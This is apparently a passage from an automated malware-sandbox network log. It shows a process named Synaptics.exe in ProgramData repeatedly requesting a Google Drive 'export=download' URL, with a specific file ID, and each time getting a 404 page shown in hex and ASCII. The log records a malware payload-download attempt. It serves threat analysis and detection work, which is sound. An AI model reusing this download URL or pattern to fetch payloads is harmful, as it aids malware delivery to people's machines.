                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="spyQJKJxWbYZ6SivHf5yeQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:49 UTC444INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:49 UTC445INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        145192.168.2.349909142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:49 UTC442OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:49 UTC445INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:49 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-+vEljsBveIGPO6YfMSYE3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:49 UTC446INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:49 UTC446INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 38 34 2f 6c 6d 41 46 33 6f 70 52 44 59 6b 54 7a 62 30 61 64 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Y84/lmAF3opRDYkTzb0adg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:49 UTC447INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:49 UTC448INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        146192.168.2.349910142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:49 UTC445OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:49 UTC448INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:49 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-+1pDUm9jgHRYXEZxP4WPKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:49 UTC449INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 44 46 38 73 79 72 66 30 50 43 65 34 32 64 32 74 72 79 4f 6a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fDF8syrf0PCe42d2tryOjQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:49 UTC451INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:49 UTC451INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        147192.168.2.349911142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:49 UTC448OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:49 UTC451INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:49 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2y+bWwiHQgTg/WQF8lnPHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:49 UTC452INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 77 4d 65 49 75 38 6b 63 66 6a 52 4a 46 6e 42 31 2f 44 51 49 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VwMeIu8kcfjRJFnB1/DQIg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:49 UTC454INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:49 UTC454INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        148192.168.2.349912142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:49 UTC451OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:49 UTC454INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:49 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-C4VnkrGxDMqQ0zz/WtrY7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:49 UTC456INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 6d 38 32 75 4b 51 66 75 71 38 70 67 43 57 33 4f 36 68 44 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7m82uKQfuq8pgCW3O6hDCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:49 UTC457INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:49 UTC457INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        149192.168.2.349913142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:49 UTC454OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:50 UTC457INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:49 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7t6by/HqkAVsCmKYOikUgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:50 UTC459INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:50 UTC459INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 39 64 64 64 69 31 6e 57 76 43 30 6b 4c 46 37 36 39 4c 45 4c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="d9dddi1nWvC0kLF769LELQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
